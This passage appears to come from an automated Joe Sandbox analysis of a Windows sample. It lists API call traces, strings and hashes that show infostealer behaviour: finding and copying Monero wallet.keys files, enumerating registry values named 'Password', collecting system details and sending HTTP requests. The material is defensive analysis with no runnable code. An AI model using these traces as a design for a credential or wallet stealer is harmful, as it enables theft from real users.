                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404B6D
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404B85
                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,04330780,?,043387A0,00000000,00000000,00400100,00000000), ref: 004047D5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404B8F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                        • String ID: "$"$------$------$------$J&f
                                                                                                                                                        • API String ID: 460715078-2398766951
                                                                                                                                                        • Opcode ID: 7cda8d5521d99cf19aaaaf71ff52ec70d860003ad009979284783f799879de92
                                                                                                                                                        • Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
                                                                                                                                                        • Opcode Fuzzy Hash: 7cda8d5521d99cf19aaaaf71ff52ec70d860003ad009979284783f799879de92
                                                                                                                                                        • Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(00000000,04332E78,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                        • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                        • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                                                                        • String ID: - $%s\%s$?
                                                                                                                                                        • API String ID: 3246050789-3278919252
                                                                                                                                                        • Opcode ID: f99f990ee98b2c87e49eb54a0476dff1419a0cb08dcebe01bba17a831a97a86a
                                                                                                                                                        • Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
                                                                                                                                                        • Opcode Fuzzy Hash: f99f990ee98b2c87e49eb54a0476dff1419a0cb08dcebe01bba17a831a97a86a
                                                                                                                                                        • Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • strtok_s.MSVCRT ref: 0040F667
                                                                                                                                                        • strtok_s.MSVCRT ref: 0040FA8F
                                                                                                                                                          • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0432E458,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                          • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 348468850-0
                                                                                                                                                        • Opcode ID: 3c0a368077967c4d6cb00d96c460f66b96e072591d38366c86bc8a63ce48f73f
                                                                                                                                                        • Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
                                                                                                                                                        • Opcode Fuzzy Hash: 3c0a368077967c4d6cb00d96c460f66b96e072591d38366c86bc8a63ce48f73f
                                                                                                                                                        • Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 004012E7
                                                                                                                                                          • Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                          • Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                          • Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                          • Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                          • Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040130F
                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0040131C
                                                                                                                                                        • lstrcat.KERNEL32(?,.keys), ref: 00401337
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                          • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,043378D8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425
                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                          • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                          • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                          • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                          • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                          • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                          • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 004014A9
                                                                                                                                                        • memset.MSVCRT ref: 004014D0
                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04330750), ref: 00404ED9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
                                                                                                                                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                        • API String ID: 2054947926-218353709
                                                                                                                                                        • Opcode ID: 55317b6d737fdd9b0cce10d4996af803ea1c6e882ae9976ce4a7b1677b3be5f7
                                                                                                                                                        • Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
                                                                                                                                                        • Opcode Fuzzy Hash: 55317b6d737fdd9b0cce10d4996af803ea1c6e882ae9976ce4a7b1677b3be5f7
                                                                                                                                                        • Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
                                                                                                                                                          • Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
                                                                                                                                                          • Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
                                                                                                                                                          • Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
                                                                                                                                                          • Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
                                                                                                                                                          • Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                        • lstrcat.KERNEL32(30AA7020,0041DEB8), ref: 00406FD6
                                                                                                                                                        • lstrcat.KERNEL32(30AA7020,00000000), ref: 00407018
                                                                                                                                                        • lstrcat.KERNEL32(30AA7020, : ), ref: 0040702A
                                                                                                                                                        • lstrcat.KERNEL32(30AA7020,00000000), ref: 0040705F
                                                                                                                                                        • lstrcat.KERNEL32(30AA7020,0041DEC0), ref: 00407070
                                                                                                                                                        • lstrcat.KERNEL32(30AA7020,00000000), ref: 004070A3
                                                                                                                                                        • lstrcat.KERNEL32(30AA7020,0041DEC4), ref: 004070BD
                                                                                                                                                        • task.LIBCPMTD ref: 004070CB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                                                                                        • String ID: : $`v@$h0A
                                                                                                                                                        • API String ID: 3191641157-3559972273
                                                                                                                                                        • Opcode ID: 1bad08d2076e3e89f4364c8d83dbdbb36a614798d25560e064741be9e1e65df2
                                                                                                                                                        • Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
                                                                                                                                                        • Opcode Fuzzy Hash: 1bad08d2076e3e89f4364c8d83dbdbb36a614798d25560e064741be9e1e65df2
                                                                                                                                                        • Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: image/jpeg
                                                                                                                                                        • API String ID: 0-3785015651
                                                                                                                                                        • Opcode ID: 404b0b46b206b3bf4871344594db70cb3467a452f73d0affe24fd8bd6f785462
                                                                                                                                                        • Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
                                                                                                                                                        • Opcode Fuzzy Hash: 404b0b46b206b3bf4871344594db70cb3467a452f73d0affe24fd8bd6f785462
                                                                                                                                                        • Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
                                                                                                                                                        • InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
                                                                                                                                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
                                                                                                                                                        • InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
                                                                                                                                                        • InternetCloseHandle.WININET(c.A), ref: 00404D75
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00404D82
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                                                                                                                        • String ID: c.A$c.A
                                                                                                                                                        • API String ID: 3066467675-270182787
                                                                                                                                                        • Opcode ID: b883753fc3e69b7f41e944ae3663d1622002b5338cc9304bc8ff2cb9a4e93150
                                                                                                                                                        • Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
                                                                                                                                                        • Opcode Fuzzy Hash: b883753fc3e69b7f41e944ae3663d1622002b5338cc9304bc8ff2cb9a4e93150
                                                                                                                                                        • Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00406CE4
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
                                                                                                                                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                          • Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B
                                                                                                                                                        • task.LIBCPMTD ref: 00406F25
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                                                                        • String ID: Password
                                                                                                                                                        • API String ID: 2698061284-3434357891
                                                                                                                                                        • Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                        • Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
                                                                                                                                                        • Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                        • Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                        • wsprintfA.USER32 ref: 004142DD
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                        • String ID: :$C$\
                                                                                                                                                        • API String ID: 3790021787-3809124531
                                                                                                                                                        • Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                        • Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
                                                                                                                                                        • Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                        • Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                        • ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                        • LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
                                                                                                                                                        • String ID: '@$'@
                                                                                                                                                        • API String ID: 1815715184-345573653
                                                                                                                                                        • Opcode ID: ade6bf95ff6b3192d7b4b22adc4c9fce4594f25298dc92e23d3df2276528e089
                                                                                                                                                        • Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
                                                                                                                                                        • Opcode Fuzzy Hash: ade6bf95ff6b3192d7b4b22adc4c9fce4594f25298dc92e23d3df2276528e089
                                                                                                                                                        • Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,04336810,00000000,?,0041D774,00000000,?,00000000,00000000,?,043368D0), ref: 0041496D
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                        • __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                        • __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                        • wsprintfA.USER32 ref: 004149E9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                        • String ID: %d MB$@
                                                                                                                                                        • API String ID: 2886426298-3474575989
                                                                                                                                                        • Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                        • Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
                                                                                                                                                        • Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                        • Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                          • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                          • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                        • InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,04330750), ref: 00405DE7
